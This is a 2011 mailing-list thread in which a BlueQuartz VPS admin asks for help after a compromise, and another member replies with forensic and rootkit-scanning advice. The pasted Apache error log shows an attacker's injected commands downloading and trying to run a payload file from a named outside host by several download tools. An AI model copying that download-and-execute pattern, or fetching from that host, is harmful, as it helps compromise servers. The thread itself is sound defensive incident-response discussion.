I have looked in secure Used last Nothing No siteadmin logins Looks like they find a hole in some side I have no idée
-----Oorspronkelijk bericht----- Van: [email protected] [mailto:[email protected]] Namens Mike's List Verzonden: donderdag 13 oktober 2011 15:29 Aan: BlueOnyx General Mailing List Onderwerp: [BlueOnyx:08818] Re: vps hacked Have you look at /var/log/secure? Use the "last" command to see if any suspicious login via shell? (Might have to unzip those wtmp file/s for older/previous login. Is there a log for GUI login also that you can track? Run rkunter and chkrootkit for rootkit installation? Install ClamAV, Sophos, etc. for malware/antivirus scanning? RPMs for rkhunter and chkrootkit can be found below, download the appropriate version for your OS version, then "rpm -ivh <package.rpm>" and run "rkhunter -c" and/or "chkrootkit" to start scanning. http://pkgs.repoforge.org/rkhunter/ http://pkgs.repoforge.org/chkrootkit/ Mike On Thu, 13 Oct 2011, Steffan wrote: > > I still have a client with a BlueQuartz server (vps) > > > > This morning the virtual server was hacked > > I looked in the logs and found this in /var/log/httpd/error_log > > > > > > > > [Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html > > --00:07:40-- http://rapha.altervista.org/prv.txt > > => `prv.txt' > > Resolving rapha.altervista.org... 46.4.65.68 > > Connecting to rapha.altervista.org|46.4.65.68|:80... connected. > > HTTP request sent, awaiting response... 200 OK > > Length: 28,039 (27K) [text/plain] > > > > 0K .......... .......... ....... 100% 1015.53 KB/s > > > > 00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039] > > > > sh: line 1: lwp-downlod: command not found > > sh: line 1: fetch: command not found > > sh: line 2: rapha.altervista.org/prv.txt: No such file or directory > > % Total % Received % Xferd Average Speed Time Time Time Current > > Dload Upload Total Spent Left Speed > > ^M 14 28039 14 4097 0 0 98324 0 --:--:-- --:--:-- --:--:-- 98324^M100 28039 100 28039 0 0 403k 0 --:--:-- --:--:-- --:--:-- 899k > > sh: line 3: prv.txt: command not found > > --00:07:40-- http://rapha.altervista.org/prv.txt > > => `prv.txt' > > Resolving rapha.altervista.org... 46.4.65.68 > > Connecting to rapha.altervista.org|46.4.65.68|:80... connected. > > HTTP request sent, awaiting response... 200 OK > > Length: 28,039 (27K) [text/plain] > > > > 0K .......... .......... ....... 100% 1020.34 KB/s > > > > 00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039] > > > > sh: line 1: lwp-downlod: command not found > > sh: line 1: fetch: command not found > > sh: line 2: rapha.altervista.org/prv.txt: No such file or directory > > % Total % Received % Xferd Average Speed Time Time Time Current > > Dload Upload Total Spent Left Speed > > ^M 4 28039 4 1201 0 0 42493 0 --:--:-- --:--:-- --:--:-- 42493^M100 28039 100 28039 0 0 507k 0 --:--:-- --:--:-- --:--:-- 1048k > > sh: line 3: prv.txt: command not found > > > > I don?t see any admin logins > > How can I find out what happened > I dont see anything weird in the access log or message log > > > > Thanxs Steffan > > > _______________________________________________ Blueonyx mailing list [email protected] http://mail.blueonyx.it/mailman/listinfo/blueonyx
